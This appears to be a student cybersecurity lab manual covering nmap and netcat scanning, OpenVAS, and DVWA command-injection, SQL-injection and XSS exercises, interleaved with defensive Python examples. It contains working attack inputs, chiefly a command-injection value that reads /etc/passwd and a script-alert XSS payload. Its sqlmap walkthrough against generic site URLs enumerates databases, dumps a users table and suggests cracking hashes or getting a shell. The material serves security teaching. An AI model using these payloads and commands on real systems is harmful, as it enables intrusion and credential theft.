
CYBER SECURITY (2150002) Er.No.: 161120105045

Practical- 2

AIM: TCP scanning using NMAP


Solution:

NMAP is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. However, the nmap command comes with
lots of options that can make the utility more robust and difficult to follow for new
users.
The purpose of this post is to introduce a user to the nmap command line tool to
scan a host and/or network, so as to find out the possible vulnerable points in the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.

Scan a single host or an IP address (IPv4)

### Scan a single IP address ###
nmap 192.168.1.1
### Scan a host name ###
nmap server1.cyberciti.biz
### Scan a host name with more info (verbose) ###
nmap -v server1.cyberciti.biz

Scan multiple IP addresses or a subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3

### Works for hosts in the same subnet, i.e. 192.168.1.0/24 ###
nmap 192.168.1.1,2,3

You can scan a range of IP addresses too:

nmap 192.168.1.1-20


You can scan a range of IP addresses using a wildcard:

nmap 192.168.1.*

Finally, you can scan an entire subnet:

nmap 192.168.1.0/24

Read a list of hosts/networks from a file (IPv4)

nmap -iL /tmp/test.txt

Create the file with one host or network per line, e.g.:

cat > /tmp/test.txt

Sample file contents:
server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost

Excluding hosts/networks (IPv4)


nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254
Note: Students are required to try all the options of NMAP and record the output.


Practical- 2

AIM: Port scanning using NMAP


Nmap (“Network Mapper”) is a free and open source utility for network exploration
and security auditing. Many systems and network administrators also find it useful
for tasks such as network inventory, managing service upgrade schedules, and
monitoring host or service uptime.

Nmap uses raw IP packets in novel ways to determine what hosts are available on
the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts.
Nmap runs on all major computer operating systems, and both console and
graphical versions are available.

Solution:
nmap -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1
## Scan UDP port 53
nmap -p U:53 192.168.1.1
## Scan two ports ##
nmap -p 80,443 192.168.1.1
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1

Sample output:


Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST


Interesting ports on 192.168.1.1:
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http
110/tcp closed pop3
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Note: Students are required to list the commands and switches used to check firewall
weaknesses and to detect the remote operating system and service versions.
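An added example, not from the lab or from nmap itself: a small Python parser for the "normal" nmap output shown above, which also compares the open ports against a baseline of approved services, the check a defender runs after an inventory scan. The report embedded in it is the one printed above; the baseline and the function names are constructed for this illustration.

```python
import re
from dataclasses import dataclass

# Sample report: the nmap output printed in this practical, embedded as test input.
SAMPLE_REPORT = """\
Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http
110/tcp closed pop3
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
"""


@dataclass
class PortRecord:
    port: int
    proto: str      # "tcp" or "udp"
    state: str      # open / closed / filtered ...
    service: str    # nmap's guess from its services table (not verified without -sV)


# "Interesting ports on X:" is the Nmap 5 wording; newer versions print
# "Nmap scan report for X". Both are accepted for a single host token.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for) (\S+?):?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")


def parse_nmap_output(text):
    """Return {'host': str|None, 'mac': str|None, 'ports': [PortRecord, ...]}."""
    report = {"host": None, "mac": None, "ports": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            report["host"] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            report["ports"].append(
                PortRecord(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
            continue
        m = MAC_RE.match(line)
        if m:
            report["mac"] = m.group(1)
    return report


def open_ports(report):
    """(port, proto, service) for every port nmap reported as open."""
    return [(p.port, p.proto, p.service) for p in report["ports"] if p.state == "open"]


def unexpected_open(report, baseline):
    """Open ports that are not in `baseline`, a set of (port, proto) the host is
    approved to expose. Anything returned here is worth a ticket: either an
    undocumented service or a change since the last scan."""
    return [(port, proto, svc) for port, proto, svc in open_ports(report)
            if (port, proto) not in baseline]


if __name__ == "__main__":
    rep = parse_nmap_output(SAMPLE_REPORT)
    print("host:", rep["host"], "mac:", rep["mac"])
    print("open:", open_ports(rep))
    # Constructed baseline: only SSH is approved on this host.
    print("unexpected:", unexpected_open(rep, {(22, "tcp")}))
```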


Practical:3
Aim: TCP / UDP connectivity using Netcat
What is Netcat?

nc, also known as the TCP/IP Swiss army knife, is a feature-rich network utility
that can read and write data over network connections using TCP or UDP.

What is port scanning?

Port scanning is the act of systematically scanning a computer's ports.

Open a new terminal (CTRL+ALT+T in Ubuntu) and run the following command
to perform a TCP port scan.

nc -v -z 127.0.0.1 25


To scan a range of ports, use the following command:

nc -v -z host port-range


Practical:4
Aim: Network Vulnerability using OpenVAS

In this exercise we will show a popular open source vulnerability scanner called
OpenVAS (Open Vulnerability Assessment System). OpenVAS is the evolution of
a previous project called Nessus, which became a proprietary tool. The actual
security scanner is accompanied by a daily updated feed of Network Vulnerability
Tests (NVTs), over 20,000 in total (as of January 2011).

Notes:

Commands preceded with "$" imply that you should execute the command as a
general user, not as root.

Commands preceded with "#" imply that you should be working as root.

Commands with more specific prompts (e.g. "RTR-GW>" or "mysql>") imply
that you are executing commands on remote equipment, or within another program.

Installation

Install the server, client and plugin packages

$ sudo apt-get install openvas-server openvas-client openvas-plugins-base \
    openvas-plugins-dfsg

Update the vulnerability database

$ sudo openvas-nvt-sync

Add a user to run the client

$ sudo openvas-adduser
Login: sysadm
Authentication (pass/cert) [pass]: HIT ENTER
Login password: USE CLASS PASSWD

You will then be asked to add "User rules".


Ideally, you will want to only allow scanning on hosts that are under your control.
To understand the syntax, check the openvas-adduser man page.

Let's allow this user to scan hosts in our lab network. Type

accept 10.10.0.0/16
default deny

then type ctrl-D to exit, and accept.

Operation

Starting the server

$ sudo service openvas-server start

The server has to load thousands of vulnerability checks, which takes VERY
LONG, especially on a machine that is not very powerful. Most likely, you will not
be able to run this on the virtual NSRC lab.

On a production setup, you will need a machine with multiple processors/cores and
quite a bit of RAM, especially if you will be scanning many hosts.

Running a scan

Create a text file with a list of hosts/networks to scan.

$ cd /home/sysadm
$ vi scanme.txt

Add one host, network per line, like this:

10.10.0.250

10.10.2.5

Check the manual for the client to understand its parameters:

$ man openvas-client

Then, run the client like this:

$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \
    openvas-output.txt -T txt -V -x

Alternatively, you can export into prettier HTML format with:


$ sudo openvas-client -q 127.0.0.1 9390 sysadm nsrc+ws scanme.txt \
    openvas-output.html -T html -V -x

You might have to transfer that file to your laptop so that you can open it with a
browser.

Keeping track of changes

You could take advantage of a version control system like Subversion or Git
to keep track of changes in the hosts you scan:

- Create a git repository.
- Add a cron job to scan hosts periodically (e.g. once a month); use the -T txt or -T xml
  report format.
- Update the repository after each run.


Practical-5
AIM: Web application testing using DVWA

What is Damn Vulnerable Web App (DVWA)?

- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
  vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a
  legal environment, help web developers better understand the processes of securing web
  applications, and aid teachers/students to teach/learn web application security in a
  classroom environment.

What is Command Execution?

- Command Execution is where a website application provides the ability to execute
  system commands.

What is a Command Injection Attack?

- The purpose of the command injection attack is to inject and execute commands specified
  by the attacker in the vulnerable application.
- In situations like this, the application, which executes unwanted system commands, is
  like a pseudo system shell, and the attacker may use it as an authorized system user.
- Note, the commands are executed with the same privileges as the application and/or web
  server.
- Command injection attacks are possible in most cases because of a lack of correct input
  data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers,
  etc.).

What is Command Injection Harvesting?

- Command Injection Harvesting is where a malicious user manipulates a website
  command execution application to render sensitive data (e.g., usernames, config files,
  directory and file listings, etc.).
  - Unix/Linux Example: 9.9.9.9; cat /etc/passwd
  - Windows Example: 9.9.9.9 && dir

Section 1: Configure Fedora14 Virtual Machine Settings


1 Open Your VMware Player


- Instructions:
1. On Your Host Computer, Go To
2. Start --> All Programs --> VMWare --> VMWare Player

2 Edit Fedora 14 Virtual Machine Settings

- Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings

3. Edit Network Adapter

  - Instructions:
  a. Highlight Network Adapter
  b. Select Bridged
  c. Click on the OK Button.


Section 2: Login to Fedora14

1 Start Fedora14 VM Instance

- Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine


2. Login to Fedora14

- Instructions:
1. Login: student
2. Password: <whatever you set it to>.

Section 3: Open Console Terminal and Retrieve IP Address

1 Start a Terminal Console

- Instructions:
1. Applications --> Terminal


2 Switch user to root

- Instructions:
1. su - root
2. <Whatever you set the root password to>

3 Get IP Address

- Instructions:
1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.106.
  - Please record your IP address.


Section 4: Start Up Damn Vulnerable Web App (DVWA)

1 Start up a Web Browser

- Instructions:
1. Applications --> Internet --> Firefox
- Notes:
  - You can open up a Web browser on any Operating System on your network.
  - Working with DVWA does not have to be done on your Fedora machine; the only
    requirements to play with DVWA are as follows:
    1. The Fedora Server is on the Network.
    2. httpd is running.
    3. mysqld is running.


2 DVWA Database setup

- Instructions:
1. http://192.168.1.106/dvwa/login.php
  - Replace 192.168.1.106 with the IP Address obtained from Section 3, Step 3.
2. Username: admin
3. Password: password
  - "password" is the default password for user admin.


3 Set Website Security Level (Part 1)

- Instructions:
1. Click on DVWA Security

4 Set Website Security Level (Part 2)

- Instructions:
1. Select Low
2. Click Submit


Section 5: Command Execution

1 Command Execution

- Instructions:
1. Click on Command Execution

2 Execute Ping

- Notes:
  - Below we are going to do a simple ping test using the web interface.
  - As an example, ping something on your network.
  - Use the IP Address obtained in Section 3, Step 3 if you have nothing else to ping.
- Instructions:
1. 192.168.1.106
2. Click Submit


3 cat /etc/passwd (Attempt 1)

- Instructions:
1. cat /etc/passwd
2. Click Submit
- Notes:
  - Notice that either a message saying "illegal IP address" was displayed or nothing
    was returned.


4 cat /etc/passwd (Attempt 2)

- Instructions:
1. 192.168.1.106; cat /etc/passwd
2. Click Submit
- Notes:
  - Notice that we are now able to see the contents of the /etc/passwd file.

5 Looking at the weakness

- Instructions:
1. Bring up a terminal window (See Section 3, Step 1, if you don't know how)
2. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
- Notes:
1. Notice the two shell_exec lines.
2. These are the lines that execute ping depending on which Operating System is
   being used.
3. On the Unix/Linux command line, you can run multiple commands separated by a ";".
4. Notice the code does not check whether $target matches an IP Address
   \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of
   multiple digits, like 192.168.1.106.
5. The code allows an attacker to append commands behind the IP Address:
   192.168.1.106; cat /etc/passwd
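An added example, not DVWA's code: the defect of low.php written in Python beside a hardened handler, which validates the target as an IP address with the standard ipaddress module and runs ping through an argv list instead of a shell. The function names are assumptions made for this illustration.

```python
import ipaddress
import subprocess


def build_ping_vulnerable(target):
    """Same defect as DVWA's low.php: the user-supplied target is pasted into a
    shell command line, so shell metacharacters in it are honoured by the shell."""
    return "ping -c 3 " + target          # would be run via shell_exec / shell=True


# Characters that give the shell a second command or a substitution.
SHELL_METACHARS = set(";&|`$\n<>()")


def shell_would_split(cmdline):
    """True if a POSIX shell could interpret cmdline as more than the intended
    single ping invocation (a cheap check for tests and request logging)."""
    return any(ch in SHELL_METACHARS for ch in cmdline)


def validate_target(target):
    r"""Allowlist validation: accept only a syntactically valid IPv4/IPv6 address.
    ipaddress rejects '192.168.1.106; cat /etc/passwd', '999.1.1.1' and a bare
    hostname; a regex like \d+.\d+.\d+.\d+ with unescaped dots would not."""
    return str(ipaddress.ip_address(target.strip()))  # raises ValueError on junk


def build_ping_hardened(target):
    """Validated address in an argv list: no shell is involved at all, so even
    a value that slipped past validation could not become a second command."""
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target):
    """Run the hardened command and return its stdout (ValueError on bad input)."""
    result = subprocess.run(build_ping_hardened(target), capture_output=True,
                            text=True, timeout=20)
    return result.stdout


if __name__ == "__main__":
    evil = "192.168.1.106; cat /etc/passwd"      # the input used in Section 5, step 4
    cmd = build_ping_vulnerable(evil)
    print(cmd, "->", "splits into two commands" if shell_would_split(cmd) else "one command")
    try:
        build_ping_hardened(evil)
    except ValueError as e:
        print("rejected:", e)
```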


6 Copy the /etc/passwd file to /tmp

- Instructions:
1. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
- Note:
  - Here we are not only displaying the contents of /etc/passwd on the webpage, but
    also copying the /etc/passwd file to the /tmp directory.


Section 6: Proof of Lab

1 Proof of Lab

- Instructions:
1. Bring up a terminal window
2. cd /tmp
3. ls -l passwd
4. date
5. echo "Your Name"
  - Replace the string "Your Name" with your actual name.
  - e.g., echo "John Gray"
- Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle


Practical-6
AIM: SQL INJECTION USING DVWA
SQL injection is considered a high-risk vulnerability because it can lead to full
compromise of the remote system. This is why in almost all web application penetration testing
engagements the applications are checked for SQL injection flaws. A general and simple
definition: an application is vulnerable to SQL injection when its input allows you to interact
with the database and execute your own queries on it.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment

SQL Injection

SQL injection (also known as SQL fishing) is a technique often used to attack data-driven
applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the
website to pass a newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique that exploits a security
vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but can be used to
attack any type of SQL database.
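An added example, not DVWA's code, using Python's built-in sqlite3 in place of MySQL: the concatenated query of the low-security page beside a parameterized one, run against a constructed users table with an input containing a quote, to show why only the first returns every row. Table contents and function names are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users (first_name, last_name) VALUES (?, ?)",
                     [("admin", "admin"), ("Gordon", "Brown"), ("Pablo", "Picasso")])
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation, as in DVWA's low-security SQL Injection page.
    A quote inside user_id closes the string literal and whatever follows is
    parsed as SQL: the 'incorrectly filtered string literal escape characters'
    case described above."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Bound parameter: the statement text is fixed and the value travels
    separately, so it can only ever be compared, never parsed."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_typed(conn, user_id):
    """Belt and braces: the input is meant to be an integer, so enforce the type
    before it reaches the database (the 'not strongly typed' case above)."""
    return lookup_parameterized(conn, int(user_id))   # ValueError on non-numeric input


if __name__ == "__main__":
    db = make_db()
    probe = "1' OR '1'='1"   # constructed input containing a quote
    print("vulnerable:   ", lookup_vulnerable(db, probe))     # every row
    print("parameterized:", lookup_parameterized(db, probe))  # no row
```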

PROCESS

Install XAMPP
Copy DVWA-1.0.8 INTO XAMPP/HTDOCS folder
Start XAMPP program
Start APACHE and MYSQL module by clicking on start.


Start Firefox

Type http://127.0.0.1/DVWA-1.0.8/login.php

Login: admin

Password: password

Click on Login


2. SET SECURITY LEVEL

a) Set DVWA Security Level

Click on DVWA Security in the left-hand menu.
Select "low".
Click Submit.


Practical-7
Aim: XSS using DVWA
What is Damn Vulnerable Web App (DVWA)?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.

Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment.

What is Cross Site Scripting?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web
applications.

XSS enables attackers to inject client-side script into Web pages viewed by other users.

A cross-site scripting vulnerability may be used by attackers to bypass access controls such as
the same-origin policy. In addition, the attacker can send input (e.g., username, password, session
ID, etc.) which can later be captured by an external script. The victim's browser has no way to
know that the script should not be trusted, and will execute it. Because it thinks the script
came from a trusted source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
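An added example, not DVWA's code: a guestbook entry rendered both raw and HTML-encoded in Python, with a check that a unit test or a response-side monitor can use to confirm that no script tag survives encoding. The message is the one used in Step 4 below; the function names are assumptions.

```python
import html
import re


def render_entry_vulnerable(name, message):
    """Reflects the submitted values into the page unchanged, the behaviour that
    makes the DVWA guestbook exploitable at the 'low' security level."""
    return '<div class="entry"><b>' + name + "</b>: " + message + "</div>"


def render_entry_safe(name, message):
    """HTML-encode every untrusted value for the context it lands in (here:
    element text). quote=True also encodes ' and ", so the same call is safe
    inside attribute values."""
    return '<div class="entry"><b>{}</b>: {}</div>'.format(
        html.escape(name, quote=True), html.escape(message, quote=True))


# Markers of active content that must never appear raw inside user-supplied data:
# a script tag, a javascript: URL, or an on* event-handler attribute.
ACTIVE_RE = re.compile(r"<\s*script|javascript:|<\s*\w+[^>]*\son\w+\s*=", re.I)


def contains_active_markup(fragment):
    """True if the rendered fragment still carries executable markup."""
    return ACTIVE_RE.search(fragment) is not None


if __name__ == "__main__":
    name = "Test 1"
    msg = '<script>alert("This is a XSS Exploit Test")</script>'  # the Step 4 message
    for label, page in (("vulnerable", render_entry_vulnerable(name, msg)),
                        ("safe", render_entry_safe(name, msg))):
        print(label, "-> active markup:", contains_active_markup(page))
        print("   ", page)
```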

Step 1:


Step 2: Set DVWA Security Level

Instructions: Click on DVWA Security in the left-hand menu.

Select "low" and click Submit.

Step 3:


Step 4: Basic XSS Test

Instructions:
Name: Test 1
Message: <script>alert("This is a XSS Exploit Test")</script>
Click Sign Guestbook

Step 5: Result


Practical-8
Aim : Automated SQL injection with SqlMap
sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester, and a broad range of
switches ranging from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.

Features

- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
  IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management
  systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind,
  error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing
  DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and
  columns.
- Automatic recognition of password hash formats and support for cracking them using a
  dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per the user's
  choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or
  specific columns across all databases' tables. This is useful, for instance, to identify tables
  containing custom application credentials where relevant columns' names contain strings like
  name and pass.
- Support to download and upload any file from the database server's underlying file system
  when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database
  server's underlying operating system when the database software is MySQL, PostgreSQL or
  Microsoft SQL Server.

Download

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Hacking with sqlmap

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the
terminal with the Python interpreter.

python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and most simple command to run with the sqlmap tool. It checks the input
parameters to find whether they are vulnerable to SQL injection or not. For this, sqlmap sends
different kinds of SQL injection payloads to the input parameter and checks the output. In the
process sqlmap is also able to identify the remote system OS, database name and version. Here is
how the output might look:

[*] starting at 12:10:33


[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5


So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive. But it's time to move on and see what
more this tool is capable of.

Discover Databases
Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next
step is to find out the names of the databases that exist on the remote system. The "--dbs" option
is used to get the database list.

$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56


[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT
COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0
END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
The output shows the existing databases on the remote system.


Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of
interest here is 'safecosmetics'.

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL

web server operating system: FreeBSD

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

[11:55:18] [INFO] fetching tables for database: 'safecosmetics'

[11:55:19] [INFO] heuristics detected web page charset 'ascii'

[11:55:19] [INFO] the SQL query used returns 216 entries

[11:55:20] [INFO] retrieved: acl_acl

[11:55:21] [INFO] retrieved: acl_acl_sections

........... more tables

Isn't this amazing? It is, of course. Let's get the columns of a particular table now.

Get columns of a table


Now that we have the list of tables with us, it would be a good idea to get the columns of some
important table. Let's say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL


web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'


[12:17:41] [INFO] the SQL query used returns 8 entries


[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash


[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+

So now the columns are clearly visible.

Get data from a table


Now comes the most interesting part: extracting the data from the table. The command would
be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the
mysqldump command.
The output might look similar to this


+----+--------------------+-------+---------+----------+------------+-------------+-------------------+
| id | hash               | name  | email   | password | permission | system_home | system_allow_only |
+----+--------------------+-------+---------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-------+---------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would
get the login details right away. sqlmap will create a CSV file containing the dumped data for easy
analysis.

So far we have been able to collect a lot of information from the remote database using sqlmap.
It's almost like having direct access to the remote database through a client like phpMyAdmin. In real
scenarios hackers would try to gain a higher level of access to the system. For this, they would
try to crack the password hashes and log in through the admin panel. Or they would try to
get an OS shell using sqlmap.
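An added example, written for this page rather than taken from sqlmap: detection logic on the defender's side that decodes constructed Apache access-log lines and flags the error-based payload shape printed in the sqlmap output above (FLOOR(RAND(0)*2), INFORMATION_SCHEMA probes, CONCAT with hex markers) as well as the sqlmap User-Agent string. The log lines and the signature names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines. Line 2 carries the error-based payload
# printed in the sqlmap output above (URL-encoded, as a server would log it);
# line 4 carries part of the same payload behind an ordinary browser User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Nov/2012:12:10:30 +0530] "GET /section.php?id=51 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/Nov/2012:12:10:33 +0530] "GET /section.php?id=51%20AND%20%28SELECT%201489%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a73776c3a%2C%28SELECT%20%28CASE%20WHEN%20%281489%3D1489%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a76653a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 311 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.9 - - [27/Nov/2012:12:11:02 +0530] "GET /section.php?id=52 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [27/Nov/2012:12:13:00 +0530] "GET /section.php?id=51%20AND%20FLOOR%28RAND%280%29%2A2%29%3D1 HTTP/1.1" 500 311 "-" "Mozilla/5.0"',
]

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

UA_RE = re.compile(r"sqlmap", re.I)

# Patterns taken from the payload shape shown above. They are matched against the
# URL-decoded request target so that percent-encoding does not hide them.
PAYLOAD_SIGNATURES = [
    ("error-based-floor-rand",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("information-schema-probe", re.compile(r"INFORMATION_SCHEMA\.", re.I)),
    ("concat-hex-marker", re.compile(r"CONCAT\s*\(\s*0x[0-9a-f]+", re.I)),
]


def parse_log_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status, ua = m.groups()
    return {"src": src, "time": ts, "method": method,
            "target": unquote_plus(target), "status": int(status), "ua": ua}


def classify(entry):
    """Names of the signatures an entry triggers (empty list if none)."""
    hits = []
    if UA_RE.search(entry["ua"]):
        hits.append("sqlmap-user-agent")
    for name, rx in PAYLOAD_SIGNATURES:
        if rx.search(entry["target"]):
            hits.append(name)
    return hits


def scan_log(lines):
    """One finding per suspicious line: source, time, decoded target and hits."""
    findings = []
    for line in lines:
        entry = parse_log_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"src": entry["src"], "time": entry["time"],
                             "status": entry["status"], "target": entry["target"],
                             "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["src"], f["status"], f["hits"])
```

A sudden run of 500 responses from one source, as in the two flagged lines, is itself a useful secondary signal for error-based probing even when the payload pattern is not recognised.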

